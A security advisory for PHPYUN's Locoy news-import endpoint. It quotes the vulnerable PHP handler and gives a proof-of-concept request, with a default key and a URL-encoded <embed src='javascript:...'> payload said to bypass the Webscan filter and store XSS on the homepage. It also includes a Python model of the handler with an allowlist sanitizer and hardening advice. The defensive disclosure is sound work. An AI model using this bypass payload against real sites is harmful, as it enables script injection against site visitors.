PHPYUN: bypassing Webscan to push an XSS job listing onto the homepage

Published: 2025-04-13
Revised: 2025-04-13

### Summary

PHPYUN's Locoy (火车头) news-import API accepts a job listing whose HTML body is stored unfiltered, so a remote caller who knows the shared Locoy key can plant a stored XSS payload on the homepage. The `<embed src="javascript:...">` vector is what gets the payload past the Webscan filter.

### Details

api/locoy/model/news.class.php:

```php
class news_controller extends common{
    function addnews_action(){ // add a news item
        include("locoy_config.php");
        // Reply 4: the Locoy import switch is off.
        if($locoyinfo['locoy_online']!=1){
            echo 4;die;
        }
        // Reply 5: key mismatch. The shared key in the GET string is the only
        // authentication on this endpoint.
        if($locoyinfo['locoy_key']!=trim($_GET['key'])){
            echo 5;die;
        }
        // Reply 2: a required field is missing.
        if(!$_POST['title'] || !$_POST['content'] || !$_POST['nid']){
            echo 2;die;
        }
        // Reply 3: an item with the same title and nid already exists.
        $row=$this->obj->DB_select_once("news_base","`title`='".trim($_POST['title'])."' and `nid`='".$_POST['nid']."'");
        if(is_array($row)){
            echo 3;die;
        }
        // The HTML body is taken exactly as posted; nothing filters it
        // before it is stored.
        $content=$_POST['content'];
        // ... remainder of the handler omitted on the original page
    }
}
```

Each numeric reply tells the caller exactly which check failed, so a remote user can confirm that the import switch is on and then test keys. Once a request passes the key check and carries a `title`, `content` and `nid` that do not collide with an existing row, `$_POST['content']` goes into `news_base` untouched.

Request URL:

```
http://localhost/phpyun40/api/locoy/index.php?admin_dir=admin&m=news&c=addnews&key=phpyun
```

POST data (the title is GBK-encoded and decodes to 最新招聘, "latest jobs"; `content` decodes to `<embed src="javascript:alert(1)"/>`):

```
title=%D7%EE%D0%C2%D5%D0%C6%B8&color=%23E53333&content=%3Cembed%20src%3D%22javascript%3Aalert%281%29%22%2f%3E&nid=511112671&keyword=xxxxxx
```

Homepage after the request:

![1.png](https://images.seebug.org/upload/201507/2322292073fd8267a4252df7dd2effcd59611387.png)
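The handler's decision logic and the step it lacks, as an added example that is not PHPYUN's code: the Python below re-implements the checks visible in `addnews_action` (same reply codes), decodes the advisory's POST body the way a GBK-configured site would, and stores the result with and without an allowlist HTML filter of our own. `CONSTRUCTED_CONFIG` (standing in for `locoy_config.php`, with `locoy_key` set to the `phpyun` value the request above uses), the in-memory list standing in for `news_base`, the `ACCEPTED` placeholder (the success reply is not shown on the page) and `sanitize_html` are all assumptions made for the demonstration.

```python
"""Added example, not PHPYUN's code: a Python model of the checks in
news_controller::addnews_action plus an allowlist filter for `content`.
Assumptions: CONSTRUCTED_CONFIG stands in for locoy_config.php, a list
stands in for the news_base table, ACCEPTED is a placeholder (the success
reply is not shown in the advisory) and sanitize_html is our own fix."""
import html
import re
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Constructed config: the advisory's request authenticates with key=phpyun.
CONSTRUCTED_CONFIG = {"locoy_online": 1, "locoy_key": "phpyun"}

# Reply codes echoed by the PHP handler; each one discloses which check failed.
OFFLINE, BAD_KEY, MISSING_FIELD, DUPLICATE = "4", "5", "2", "3"
ACCEPTED = "ok"  # placeholder: the success reply is not shown on the page


def addnews(config, news_table, query, post, sanitize=None):
    """Mirror addnews_action: gate on locoy_online and the shared key, require
    title/content/nid, reject a duplicate (title, nid), then store the row.
    The real handler stores content as received; pass `sanitize` to model the
    fix. Returns the reply code."""
    if config.get("locoy_online") != 1:
        return OFFLINE
    if config.get("locoy_key") != query.get("key", "").strip():
        return BAD_KEY
    if not post.get("title") or not post.get("content") or not post.get("nid"):
        return MISSING_FIELD
    title = post["title"].strip()
    if any(r["title"] == title and r["nid"] == post["nid"] for r in news_table):
        return DUPLICATE
    content = post["content"]
    if sanitize is not None:
        content = sanitize(content)  # the step the original handler lacks
    news_table.append({"title": title, "nid": post["nid"], "content": content})
    return ACCEPTED


# Hardening: allowlist the markup a job listing may legitimately contain.
ALLOWED_TAGS = {"p", "br", "b", "strong", "i", "em", "ul", "ol", "li", "a"}
ALLOWED_ATTRS = {"a": {"href"}}
SAFE_HREF = re.compile(r"^(https?:|mailto:|/|#)", re.I)  # URL scheme allowlist


class _Allowlist(HTMLParser):
    """Rebuild the fragment from allowlisted tags/attributes only; <embed>,
    <script>, <iframe>, on* handlers and javascript: URLs are dropped."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return  # tag dropped; any text inside it is still escaped as data
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # drops src, style, onload, onerror, ...
            if name == "href" and not SAFE_HREF.match((value or "").strip()):
                continue  # drops javascript:, data:, vbscript: links
            kept.append(f' {name}="{html.escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(html.escape(data, quote=False))


def sanitize_html(fragment):
    parser = _Allowlist()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)


# The advisory's POST body, verbatim (the title is GBK-encoded).
POC_BODY = ("title=%D7%EE%D0%C2%D5%D0%C6%B8&color=%23E53333"
            "&content=%3Cembed%20src%3D%22javascript%3Aalert%281%29%22%2f%3E"
            "&nid=511112671&keyword=xxxxxx")


def decode_poc(body=POC_BODY):
    """Decode the form body the way a GBK-configured PHP site would."""
    return {k: v[0] for k, v in parse_qs(body, encoding="gbk").items()}


def demo():
    """Store the PoC listing with and without the filter; return both bodies."""
    post, query = decode_poc(), {"key": "phpyun"}
    raw, fixed = [], []
    addnews(CONSTRUCTED_CONFIG, raw, query, post)
    addnews(CONSTRUCTED_CONFIG, fixed, query, post, sanitize=sanitize_html)
    return raw[0]["content"], fixed[0]["content"]
```

`demo()` returns the `<embed>` payload unchanged for the unfiltered path and an empty string once the filter runs. `html.parser` is not a full HTML5 sanitizer, so in the PHP code base the equivalent fix is to pass `$content` through a maintained allowlist filter such as HTMLPurifier before the insert; independently of that, a deployment should keep `locoy_online` at 0 unless imports are in use and set a per-install `locoy_key`, since that key is the endpoint's only authentication and the reply codes let a caller tell an offline switch from a wrong key.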
